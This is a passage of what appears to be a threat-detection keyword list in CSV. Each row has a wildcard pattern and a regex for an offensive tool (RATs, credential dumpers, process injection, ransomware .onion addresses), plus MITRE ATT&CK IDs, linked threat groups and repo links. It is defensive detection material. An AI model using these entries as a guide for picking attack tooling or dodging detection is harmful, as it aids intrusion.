BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","54942"
"*Plugins.Brutelist*",".{0,1000}Plugins\.Brutelist.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux #content","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","54943"
"*plugins.nessus.org.*",".{0,1000}plugins\.nessus\.org\..{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","54944"
"*plugins/nemesis.rb*",".{0,1000}plugins\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","54945"
"*Plugins\AccessTokens\TokenDriver*",".{0,1000}Plugins\\AccessTokens\\TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","54946"
"*Plugins\AccessTokens\TokenManipulation*",".{0,1000}Plugins\\AccessTokens\\TokenManipulation.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","54947"
"*Plugins\Execution\PSExec*",".{0,1000}Plugins\\Execution\\PSExec.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","54948"
"*plugins\ScreenControl.dll*",".{0,1000}plugins\\ScreenControl\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","54949"
"*Plugins\SendFile.dll*",".{0,1000}Plugins\\SendFile\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","54950"
"*Plugins\SendMemory.dll*",".{0,1000}Plugins\\SendMemory\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","54951"
"*plummm/CVE-2022-27666*",".{0,1000}plummm\/CVE\-2022\-27666.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","54952"
"*pm3 -p /dev/ttyACM0*",".{0,1000}pm3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54953"
"*PME\LSA\*-LSA.txt*",".{0,1000}PME\\LSA\\.{0,1000}\-LSA\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","54954"
"*PME\UserFiles\*-UserFiles.txt*",".{0,1000}PME\\UserFiles\\.{0,1000}\-UserFiles\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","54955"
"*pnanlicgxkku2aonwsg2fwid3maycsso7joqnzp66wkfemzdk7ahsdid.onion*",".{0,1000}pnanlicgxkku2aonwsg2fwid3maycsso7joqnzp66wkfemzdk7ahsdid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54956"
"*PoC To enumerate logged on users on a remote system using the winreg named pipe*",".{0,1000}PoC\sTo\senumerate\slogged\son\susers\son\sa\sremote\ssystem\susing\sthe\swinreg\snamed\spipe.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A","54957"
"*poc.bash*",".{0,1000}poc\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","#linux","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54958"
"*poc.bat*",".{0,1000}poc\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54959"
"*poc.bin*",".{0,1000}poc\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54960"
"*poc.exe*",".{0,1000}poc\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54961"
"*poc.exe*poc.txt*",".{0,1000}poc\.exe.{0,1000}poc\.txt.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","54962"
"*poc.msi*",".{0,1000}poc\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54963"
"*poc.pl*",".{0,1000}poc\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54964"
"*poc.ps1*",".{0,1000}poc\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54965"
"*poc.reg*",".{0,1000}poc\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54966"
"*poc.run*",".{0,1000}poc\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54967"
"*poc.sh*",".{0,1000}poc\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54968"
"*poc.vb*",".{0,1000}poc\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54969"
"*poc.vbe*",".{0,1000}poc\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54970"
"*poc.vbs*",".{0,1000}poc\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54971"
"*poc.vbscript*",".{0,1000}poc\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54972"
"*poc.zsh*",".{0,1000}poc\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54973"
"*POC_CloudFilter_ArbitraryFile_EoP*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54974"
"*POC_CloudFilter_ArbitraryFile_EoP.*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54975"
"*POC1*implant.cpp*",".{0,1000}POC1.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","54976"
"*POC2*implant.cpp*",".{0,1000}POC2.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","54977"
"*pocs_go/*/CVE-*.go*",".{0,1000}pocs_go\/.{0,1000}\/CVE\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","54978"
"*pod4gkypkd6kykwoht3kioehhpoh4k75ybdfoe6q7hqbphrd77b32jqd.onion*",".{0,1000}pod4gkypkd6kykwoht3kioehhpoh4k75ybdfoe6q7hqbphrd77b32jqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54979"
"*podalirius@protonmail.com*",".{0,1000}podalirius\@protonmail\.com.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#email","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","54980"
"*podman run * --name avred -d avred*",".{0,1000}podman\srun\s.{0,1000}\s\-\-name\savred\s\-d\savred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","54981"
"*poetry run bofhound*",".{0,1000}poetry\srun\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","54983"
"*poetry run hekatomb*",".{0,1000}poetry\srun\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","54984"
"*poetry run NetExec *",".{0,1000}poetry\srun\sNetExec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","54985"
"*poetry run pysqlrecon*",".{0,1000}poetry\srun\spysqlrecon.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","54986"
"*poetry run ritm *",".{0,1000}poetry\srun\sritm\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","54987"
"*pogostick.net/~pnh/ntpasswd/*",".{0,1000}pogostick\.net\/\~pnh\/ntpasswd\/.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54988"
"*PointAndPrint.ps1*",".{0,1000}PointAndPrint\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","54989"
"*poison_ivy_c2*",".{0,1000}poison_ivy_c2.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54990"
"*Poisoners-Session.log*",".{0,1000}Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#logfile","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","54991"
"*poisonivy_bof.*",".{0,1000}poisonivy_bof\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54992"
"*poisontap*",".{0,1000}poisontap.{0,1000}","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/samyk/poisontap","1","0","N/A","N/A","N/A","10","6345","993","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z","54993"
"*PoisonTendy.dll*",".{0,1000}PoisonTendy\.dll.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","54994"
"*polenum *-protocols *",".{0,1000}polenum\s.{0,1000}\-protocols\s.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","54995"
"*polenum -h*",".{0,1000}polenum\s\-h.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","54996"
"*Policy SPN target name validation might be restricting full DRSUAPI dump*",".{0,1000}Policy\sSPN\starget\sname\svalidation\smight\sbe\srestricting\sfull\sDRSUAPI\sdump.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","54997"
"*Policy SPN target name validation might be restricting full DRSUAPI dump*",".{0,1000}Policy\sSPN\starget\sname\svalidation\smight\sbe\srestricting\sfull\sDRSUAPI\sdump.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54998"
"*pony-02.aftxt*",".{0,1000}pony\-02\.aftxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55000"
"*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55002"
"*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55003"
"*PoolParty.exe *",".{0,1000}PoolParty\.exe\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55004"
